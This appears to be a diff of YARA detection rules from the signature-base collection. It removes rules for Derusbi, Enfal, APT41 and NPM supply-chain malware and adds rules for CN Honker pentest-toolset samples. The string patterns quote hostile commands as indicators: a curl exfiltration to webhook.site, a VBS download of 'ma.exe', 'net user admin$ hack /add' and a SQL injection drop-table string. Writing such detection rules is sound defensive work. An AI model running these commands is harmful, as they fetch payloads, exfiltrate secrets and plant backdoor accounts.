+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a1 = "loadso" wide ascii fullword
-		$a2 = "\nuname -a\n\n" wide ascii
-		$a3 = "/dev/shm/.x11.id" wide ascii
-		$a4 = "LxMain64" wide ascii nocase
-		$a5 = "# \\u@\\h:\\w \\$ " wide ascii
-		$b1 = "0123456789abcdefghijklmnopqrstuvwxyz" wide
-		$b2 = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ" wide
-		$b3 = "ret %d" wide fullword
-		$b4 = "uname -a\n\n" wide ascii
-		$b5 = "/proc/%u/cmdline" wide ascii
-		$b6 = "/proc/self/exe" wide ascii
-		$b7 = "cp -a %s %s" wide ascii
-		$c1 = "/dev/pts/4" wide ascii fullword
-		$c2 = "/tmp/1408.log" wide ascii fullword
+		$s0 = "http://24hack.com/xyadmin.asp" fullword ascii
+		$s1 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" fullword ascii
 
 	condition:
-		uint32( 0 ) == 0x464C457F and ( ( 1 of ( $a* ) and 4 of ( $b* ) ) or ( 1 of ( $a* ) and 1 of ( $c* ) ) or 2 of ( $a* ) or all of ( $b* ) )
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them
 }
-rule SIGNATURE_BASE_Apt_Win_Exe_Trojan_Derusbi_1 : FILE
+rule SIGNATURE_BASE_CN_Honker_Hxdef100 : FILE
 {
 	meta:
-		description = "Detects Derusbi Backdoor Win32"
-		author = "Fidelis Cybersecurity"
-		id = "6e7fecfa-f801-59b2-a394-df4c368011b7"
-		date = "2016-02-29"
+		description = "Sample from CN Honker Pentest Toolset - file hxdef100.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "3b931752-85ae-52d0-9deb-1a1b03b39e32"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://github.com/fideliscyber/indicators/tree/master/FTA-1021"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_turbo_campaign.yar#L130-L189"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L879-L895"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "02fb4da724b257aef0ec0fecfe5b7a25a23fe4dd5baae0ddd2d21350b9af34e9"
-		score = 75
-		quality = 83
+		hash = "bf30ccc565ac40073b867d4c7f5c33c6bc1920d6"
+		logic_hash = "49f15482104297f0c57713712a7add49d58007afeefd11151dc5749b755860ba"
+		score = 70
+		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$sa_4 = "HOST: %s:%d"
-		$sa_6 = "User-Agent: Mozilla"
-		$sa_7 = "Proxy-Connection: Keep-Alive"
-		$sa_8 = "Connection: Keep-Alive"
-		$sa_9 = "Server: Apache"
-		$sa_12 = "ZwUnloadDriver"
-		$sa_13 = "ZwLoadDriver"
-		$sa_18 = "_time64"
-		$sa_19 = "DllRegisterServer"
-		$sa_20 = "DllUnregisterServer"
-		$sa_21 = { 8b [5] 8b ?? d3 ?? 83 ?? 08 30 [5] 40 3b [5] 72 }
-		$sb_1 = "PCC_CMD_PACKET"
-		$sb_2 = "PCC_CMD"
-		$sb_3 = "PCC_BASEMOD"
-		$sb_4 = "PCC_PROXY"
-		$sb_5 = "PCC_SYS"
-		$sb_6 = "PCC_PROCESS"
-		$sb_7 = "PCC_FILE"
-		$sb_8 = "PCC_SOCK"
-		$sc_1 = "bcdedit -set testsigning" wide ascii
-		$sc_2 = "update.microsoft.com" wide ascii
-		$sc_3 = "_crt_debugger_hook" wide ascii
-		$sc_4 = "ue8G5" wide ascii
-		$sd_2 = "\\\\.\\pipe\\%s" wide ascii
-		$sd_3 = ".dat" wide ascii
-		$sd_4 = "CONNECT %s:%d" wide ascii
-		$sd_5 = "\\Device\\" wide ascii
-		$se_1 = "-%s-%04d" wide ascii
-		$se_2 = "-%04d" wide ascii
-		$se_5 = "2.03" wide ascii
+		$s6 = "BACKDOORSHELL" fullword ascii
+		$s15 = "%tmpdir%" fullword ascii
+		$s16 = "%cmddir%" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $sa_* ) or ( ( 8 of ( $sa_* ) ) and ( ( 5 of ( $sb_* ) ) or ( 3 of ( $sc_* ) ) or ( all of ( $sd_* ) ) or ( 1 of ( $sc_* ) and all of ( $se_* ) ) ) ) )
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
 }
-rule SIGNATURE_BASE_MAL_Enfal_Nov22 : FILE
+rule SIGNATURE_BASE_CN_Honker_Arp_EMP_V1_0 : FILE
 {
 	meta:
-		description = "Detects a certain type of Enfal Malware"
+		description = "Sample from CN Honker Pentest Toolset - file Arp EMP v1.0.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9dcba14e-2175-5da0-8629-5b952c213f6c"
-		date = "2015-02-10"
-		modified = "2023-01-06"
-		old_rule_name = "Enfal_Malware"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.enfal"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_enfal.yar#L1-L25"
+		id = "03782e94-4fac-529f-b235-19cdb124d53b"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L897-L911"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "bf349ba2b7bd635808b4ee23c6286e7dd403fbc185c6b59f0bb1fbf47ba7d9bb"
-		score = 75
+		hash = "ae4954c142ad1552a2abaef5636c7ef68fdd99ee"
+		logic_hash = "457035b1685ac7f1bdccaab0b64bb1ad3ca1bf5e0747222347ced2a11b9b9504"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		hash2 = "42fa6241ab94c73c7ab386d600fae70da505d752daab2e61819a0142b531078a"
-		hash2 = "bf433f4264fa3f15f320b35e773e18ebfe94465d864d3f4b2a963c3e5efd39c2"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$xop1 = { 00 00 83 c9 ff 33 c0 f2 ae f7 d1 49 b8 ff 8f 01 00 2b c1 }
-		$s1 = "POWERPNT.exe" fullword ascii
-		$s2 = "%APPDATA%\\Microsoft\\Windows\\" ascii
-		$s3 = "%HOMEPATH%" fullword ascii
-		$s4 = "Server2008" fullword ascii
-		$s5 = "%ComSpec%" fullword ascii
+		$s0 = "Arp EMP v1.0.exe" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( 1 of ( $x* ) or 3 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and all of them
 }
-rule SIGNATURE_BASE_Enfal_Malware_Backdoor : FILE
+rule SIGNATURE_BASE_CN_Honker_Getwebshell : FILE
 {
 	meta:
-		description = "Generic Rule to detect the Enfal Malware"
+		description = "Sample from CN Honker Pentest Toolset - file GetWebShell.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4631888c-e1e2-5969-a312-0f0011cd605c"
-		date = "2015-02-10"
+		id = "919883f4-af66-5d07-ad41-8cba3e049396"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_enfal.yar#L27-L57"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L913-L930"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6ce0c19e666cc0db50194bd56f51beddeee22c787b67810655241fdd4d34a31e"
-		score = 60
-		quality = 85
+		hash = "b63b53259260a7a316932c0a4b643862f65ee9f8"
+		logic_hash = "5d6638596607884950e702144416eb6fd3b009c88e4af5f81a50f346d7491c95"
+		score = 70
+		quality = 60
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "6d484daba3927fc0744b1bbd7981a56ebef95790"
-		hash1 = "d4071272cc1bf944e3867db299b3f5dce126f82b"
-		hash2 = "6c7c8b804cc76e2c208c6e3b6453cb134d01fa41"
 
 	strings:
-		$x1 = "Micorsoft Corportation" fullword wide
-		$x2 = "IM Monnitor Service" fullword wide
-		$s1 = "imemonsvc.dll" fullword wide
-		$s2 = "iphlpsvc.tmp" fullword
-		$z1 = "urlmon" fullword
-		$z2 = "Registered trademarks and service marks are the property of their respec" wide
-		$z3 = "XpsUnregisterServer" fullword
-		$z4 = "XpsRegisterServer" fullword
-		$z5 = "{53A4988C-F91F-4054-9076-220AC5EC03F3}" fullword
+		$s0 = "echo P.Open \"GET\",\"http://www.baidu.com/ma.exe\",0 >>run.vbs" fullword ascii
+		$s5 = "http://127.0.0.1/sql.asp?id=1" fullword wide
+		$s14 = "net user admin$ hack /add" fullword wide
+		$s15 = ";Drop table [hack];create table [dbo].[hack] ([cmd] [image])--" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) or ( all of ( $s* ) and all of ( $z* ) ) )
+		uint16( 0 ) == 0x5a4d and filesize < 70KB and 1 of them
 }
-rule SIGNATURE_BASE_MAL_JS_NPM_Supplychain_Attack_Sep25 : FILE
+rule SIGNATURE_BASE_CN_Honker_Cracker_SHELL : FILE
 {
 	meta:
-		description = "Detects obfuscated JavaScript in NPM packages used in supply chain crypto stealer attacks in September 2025"
-		author = "Florian Roth"
-		id = "f9ab0aa0-2cfe-5fae-a452-2592c129e39b"
-		date = "2025-09-09"
-		modified = "2025-11-29"
-		reference = "https://www.linkedin.com/feed/update/urn:li:activity:7370889385992437760/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_npm_supply_chain_sep25.yar#L1-L20"
+		description = "Sample from CN Honker Pentest Toolset - file SHELL.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "2249a058-7469-5054-9c51-cb20ef8197ca"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L932-L949"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1b83d1bd79cdff02ed2fff7bf1feb57801ff9a933de1bd4f7ceecf738213ab4c"
-		score = 85
+		hash = "c1dc349ff44a45712937a8a9518170da8d4ee656"
+		logic_hash = "03da662e8d5dfbae524c4949d90e143714e6c4783e02600e059172e8b09ebc57"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		hash1 = "16f6c756bc8ce5ef5d9aa1ded0f811ec0c9cee3d8f85cc151b8ca1df7b8a4337"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "const _0x112fa8=_0x180f;(function(_0x13c8b9" ascii
-		$fp1 = "<html"
-		$fp2 = "<xml "
-		$fp3 = "<?xml"
+		$s1 = "http://127.0.0.1/error1.asp" fullword ascii
+		$s2 = "password,PASSWORD,pass,PASS,Lpass,lpass,Password" fullword wide
+		$s3 = "\\SHELL" wide
+		$s4 = "WebBrowser1" fullword ascii
 
 	condition:
-		filesize < 200KB and 1 of ( $x* ) and not 1 of ( $fp* )
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
 }
-rule SIGNATURE_BASE_MAL_JS_NPM_Supplychain_Compromise_Sep25 : FILE
+rule SIGNATURE_BASE_CN_Honker_MSTSC_Can_Direct_Copy : FILE
 {
 	meta:
-		description = "Detects a supply chain compromise in NPM packages (TinyColor, CrowdStrike etc.)"
-		author = "Florian Roth"
-		id = "ff4e1c0d-1c19-562a-be7f-5427359553cd"
-		date = "2025-09-16"
-		modified = "2025-09-17"
-		reference = "https://socket.dev/blog/tinycolor-supply-chain-attack-affects-40-packages"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_npm_supply_chain_sep25.yar#L22-L48"
+		description = "Sample from CN Honker Pentest Toolset - file MSTSC_can_direct_copy.EXE"
+		author = "Florian Roth (Nextron Systems)"
+		id = "9155cb6f-14b6-524a-9cb9-1a88f7facf4e"
+		date = "2015-06-23"
+		modified = "2022-12-21"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L951-L968"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6ddcf152ee8b90496d9d3f7f51dc239d927a3a2095082d13c6cc7e21819097f4"
-		score = 80
+		hash = "2f3cbfd9f82f8abafdb1d33235fa6bfa1e1f71ae"
+		logic_hash = "5437abd979a8df5ee3f8508f7a5fff85714b5d8a22ab1760fe1e7a8168a8c255"
+		score = 70
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "if (plat === \"linux\") return \"https://github.com/trufflesecurity/trufflehog/releases"
-		$sa1 = "curl -d \"$CONTENTS\" https://webhook.site/" ascii
-		$sa2 = "curl -s -X POST -d \"$CONTENTS\" \"https://webhook.site/"
-		$sb1 = " | base64 -w 0 | " ascii
-		$sb2 = " | base64 -w0)"
+		$s1 = "srv\\newclient\\lib\\win32\\obj\\i386\\mstsc.pdb" ascii
+		$s2 = "Clear Password" fullword wide
+		$s3 = "/migrate -- migrates legacy connection files that were created with " fullword wide
 
 	condition:
-		filesize < 20MB and ( 1 of ( $x* ) or ( 1 of ( $sa* ) and 1 of ( $sb* ) ) ) and not uint8( 0 ) == 0x7b
+		uint16( 0 ) == 0x5a4d and filesize < 600KB and all of them
 }
-rule SIGNATURE_BASE_APT_APT41_POISONPLUG_3 : FILE
+rule SIGNATURE_BASE_CN_Honker_Lcx_Lcx : FILE
 {
 	meta:
-		description = "Detects APT41 malware POISONPLUG"
+		description = "Sample from CN Honker Pentest Toolset - HTRAN - file lcx.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e150dd69-c611-53de-9c7d-de28d3a208dc"
-		date = "2019-08-07"
+		id = "6c2e1e85-6387-5be2-b7b2-5ae8a5cca6df"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt41.yar#L14-L31"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L970-L988"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b74b89ac382b2b839c169cd1388d86888172f133091afd079ec42c9380935fdc"
-		score = 80
+		hash = "0c8779849d53d0772bbaa1cedeca150c543ebf38"
+		logic_hash = "6e81cac14baa9f0ae35eb26f30291cba6f7ef1864f8970b97a3e6e7205d10eb9"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		hash1 = "70c03ce5c80aca2d35a5555b0532eedede24d4cc6bdb32a2c8f7e630bba5f26e"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Rundll32.exe \"%s\", DisPlay 64" fullword ascii
-		$s2 = "tcpview.exe" fullword ascii
-		$s3 = "nuR\\noisreVtnerruC\\swodniW\\tfosorciM\\erawtfoS" fullword ascii
-		$s4 = "AxEeulaVteSgeR" fullword ascii
-		$s5 = "%04d-%02d-%02d_%02d-%02d-%02d.dmp" fullword ascii
+		$s1 = "%s -<listen|tran|slave> <option> [-log logfile]" fullword ascii
+		$s2 = "=========== Code by lion & bkbll" ascii
+		$s3 = "Welcome to [url]http://www.cnhonker.com[/url] " ascii
+		$s4 = "-tran   <ConnectPort> <TransmitHost> <TransmitPort>" fullword ascii
+		$s5 = "[+] Start Transmit (%s:%d <-> %s:%d) ......" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 900KB and 3 of them
+		uint16( 0 ) == 0x5a4d and filesize < 30KB and 1 of them
 }
-
-rule SIGNATURE_BASE_APT_APT41_POISONPLUG_SHADOW : FILE
+rule SIGNATURE_BASE_CN_Honker_Postgresql : FILE
 {
 	meta:
-		description = "Detects APT41 malware POISONPLUG SHADOW"
+		description = "Sample from CN Honker Pentest Toolset - file PostgreSQL.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e150dd69-c611-53de-9c7d-de28d3a208dc"
-		date = "2019-08-07"
+		id = "ae90d03c-ef67-5ece-81ae-86947196a81c"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt41.yar#L33-L44"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L990-L1005"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "fc923c7e85f3870e08a077b344e575d3c349fa02f3d218a9a7ec31992f14866b"
-		score = 85
+		hash = "1ecfaa91aae579cfccb8b7a8607176c82ec726f4"
+		logic_hash = "f6921e7a7c88d70c77fc30dc273aac3679a3c0ab44d4d4706d7a405f16cff6a1"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		hash1 = "462a02a8094e833fd456baf0a6d4e18bb7dab1a9f74d5f163a8334921a4ffde8"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+
+	strings:
+		$s1 = "&http://192.168.16.186/details.php?id=1" fullword ascii
+		$s2 = "PostgreSQL_inject" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and pe.imphash ( ) == "c67de089f2009b21715744762fc484e8"
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them
 }
-rule SIGNATURE_BASE_APT_APT41_CRACKSHOT : FILE
+rule SIGNATURE_BASE_CN_Honker_Webrobot : FILE
 {
 	meta:
-		description = "Detects APT41 malware CRACKSHOT"
+		description = "Sample from CN Honker Pentest Toolset - file WebRobot.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4ec34a77-dc7f-5f27-9f0a-c98438389018"
-		date = "2019-08-07"
+		id = "8b6350b6-17ea-5f44-a42a-875d55bb2de8"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt41.yar#L46-L64"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1007-L1023"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "70dd9edfc7f9ace7b00a35eb2ef664aa4fbaab8e2d268922d1593074897e769c"
-		score = 85
+		hash = "af054994c911b4301490344fca4bb19a9f394a8f"
+		logic_hash = "7d7fc9fb9156aa20993dcb809f4e1d3d357f6826dcac7e628dbe6e0f81e5a61a"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		hash1 = "993d14d00b1463519fea78ca65d8529663f487cd76b67b3fd35440bcdf7a8e31"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = ";procmon64.exe;netmon.exe;tcpview.exe;MiniSniffer.exe;smsniff.exe" ascii
-		$s1 = "RunUrlBinInMem" fullword ascii
-		$s2 = "DownRunUrlFile" fullword ascii
-		$s3 = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36" fullword ascii
-		$s4 = "%s|%s|%s|%s|%s|%s|%s|%dx%d|%04x|%08X|%s|%s" fullword ascii
+		$s1 = "%d-%02d-%02d %02d^%02d^%02d ScanReprot.htm" fullword ascii
+		$s2 = "\\log\\ProgramDataFile.dat" ascii
+		$s3 = "\\data\\FilterKeyword.txt" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 250KB and ( 1 of ( $x* ) or 2 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them
 }
-rule SIGNATURE_BASE_APT_APT41_POISONPLUG_2 : FILE
+rule SIGNATURE_BASE_CN_Honker_Baidu_Extractor_Ver1_0 : FILE
 {
 	meta:
-		description = "Detects APT41 malware POISONPLUG"
+		description = "Sample from CN Honker Pentest Toolset - file Baidu_Extractor_Ver1.0.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e150dd69-c611-53de-9c7d-de28d3a208dc"
-		date = "2019-08-07"
+		id = "94f3c3d8-aa68-5589-b26f-42315634ff30"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt41.yar#L66-L82"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1025-L1042"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f2ec2e91edaaf976169b1fa6645aeae75135e5d5f522e0fda2438f84d674f383"
+		hash = "1899f979360e96245d31082e7e96ccedbdbe1413"
+		logic_hash = "cba7357ab3cb840b3b115abe00e1a3a712feb036cae816c8ded10d73029efe2b"
 		score = 70
 		quality = 85
 		tags = "FILE"
-		hash1 = "0055dfaccc952c99b1171ce431a02abfce5c6f8fb5dc39e4019b624a7d03bfcb"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "ma_lockdown_service.dll" fullword wide
-		$s2 = "acbde.dll" fullword ascii
-		$s3 = "MA lockdown Service" fullword wide
-		$s4 = "McAfee Agent" fullword wide
+		$s3 = "\\Users\\Admin" wide
+		$s11 = "soso.com" fullword wide
+		$s12 = "baidu.com" fullword wide
+		$s19 = "cmd /c ping " fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 11000KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and all of them
 }
-
-rule SIGNATURE_BASE_APT_APT41_POISONPLUG : FILE
+rule SIGNATURE_BASE_CN_Honker_FTP_Scanning : FILE
 {
 	meta:
-		description = "Detects APT41 malware POISONPLUG"
+		description = "Sample from CN Honker Pentest Toolset - file FTP_scanning.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e150dd69-c611-53de-9c7d-de28d3a208dc"
-		date = "2019-08-07"
+		id = "828a0dc8-3748-5c07-a767-4f9e85968ca1"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt41.yar#L84-L106"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1044-L1061"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "34459c2a8a13b8084c93a640723a3e2b67d2f695ff84ab63f4e313cacc458f32"
-		score = 80
+		hash = "5a3543ee5aed110c87cbc3973686e785bcb5c44e"
+		logic_hash = "5f1c312dc9fa80c120699bacd17d5e4c147ab96f90c619a8c39ec27646a1307f"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		hash1 = "2eea29d83f485897e2bac9501ef000cc266ffe10019d8c529555a3435ac4aabd"
-		hash2 = "5d971ed3947597fbb7e51d806647b37d64d9fe915b35c7c9eaf79a37b82dab90"
-		hash3 = "f4d57acde4bc546a10cd199c70cdad09f576fdfe66a36b08a00c19ff6ae19661"
-		hash4 = "3e6c4e97cc09d0432fbbbf3f3e424d4aa967d3073b6002305cd6573c47f0341f"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "TSMSISrv.DLL" fullword wide
-		$s2 = "[-]write failed[%d]" fullword ascii
-		$s3 = "[-]load failed" fullword ascii
-		$s4 = "Remote Desktop Services" fullword wide
+		$s1 = "CNotSupportedE" fullword ascii
+		$s2 = "nINet.dll" fullword ascii
+		$s9 = "?=MODULE" fullword ascii
+		$s13 = "MSIE 6*" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 10000KB and ( pe.imphash ( ) == "1b074ef7a1c0888ef31337c8ad2f2e0a" or 2 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 550KB and all of them
 }
-rule SIGNATURE_BASE_APT_APT41_HIGHNOON : FILE
+rule SIGNATURE_BASE_CN_Honker_Dirdown_Dirdown : FILE
 {
 	meta:
-		description = "Detects APT41 malware HIGHNOON"
+		description = "Sample from CN Honker Pentest Toolset - file dirdown.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6611fb04-7237-52d1-b29f-941c3853aeca"
-		date = "2019-08-07"
-		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt41.yar#L108-L135"
+		id = "80f98131-79bf-580d-87ad-a54a3f14b301"
+		date = "2015-06-23"
+		modified = "2022-12-21"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1063-L1080"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c8afa91f90157c3ac0f7954cd2d42022392c4e6f039d88d1dd4bace19028c2b1"
-		score = 85
+		hash = "7b8d51c72841532dded5fec7e7b0005855b8a051"
+		logic_hash = "5e8349096b7d07757c3779e13fba87f770a5ef090bc7efe36fd151c7c180edad"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		hash1 = "63e8ed9692810d562adb80f27bb1aeaf48849e468bf5fd157bc83ca83139b6d7"
-		hash2 = "4aa6970cac04ace4a930de67d4c18106cf4004ba66670cfcdaa77a4c4821a213"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "workdll64.dll" fullword ascii
-		$s1 = "\\Fonts\\Error.log" ascii
-		$s2 = "[%d/%d/%d/%d:%d:%d]" fullword ascii
-		$s3 = "work_end" fullword ascii
-		$s4 = "work_start" fullword ascii
-		$s5 = "\\svchost.exe" ascii
-		$s6 = "LoadAppInit_DLLs" fullword ascii
-		$s7 = "netsvcs" fullword ascii
-		$s8 = "HookAPIs ...PID %d " fullword ascii
-		$s9 = "SOFTWARE\\Microsoft\\HTMLHelp" fullword ascii
-		$s0 = "DllMain_mem" fullword ascii
-		$s10 = "%s\\NtKlRes.dat" fullword ascii
-		$s11 = "Global\\%s-%d" fullword ascii
+		$s0 = "\\Decompress\\obj\\Release\\Decompress.pdb" ascii
+		$s1 = "Decompress.exe" fullword wide
+		$s5 = "Get8Bytes" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and ( 1 of ( $x* ) or 4 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 45KB and all of them
 }
-
-rule SIGNATURE_BASE_APT_APT41_HIGHNOON_2 : FILE
+rule SIGNATURE_BASE_CN_Honker_Xiaokui_Conversion_Tool : FILE
 {
 	meta:
-		description = "Detects APT41 malware HIGHNOON"
+		description = "Sample from CN Honker Pentest Toolset - file Xiaokui_conversion_tool.exe"
 		author = "Florian Roth (Nextron Systems)"
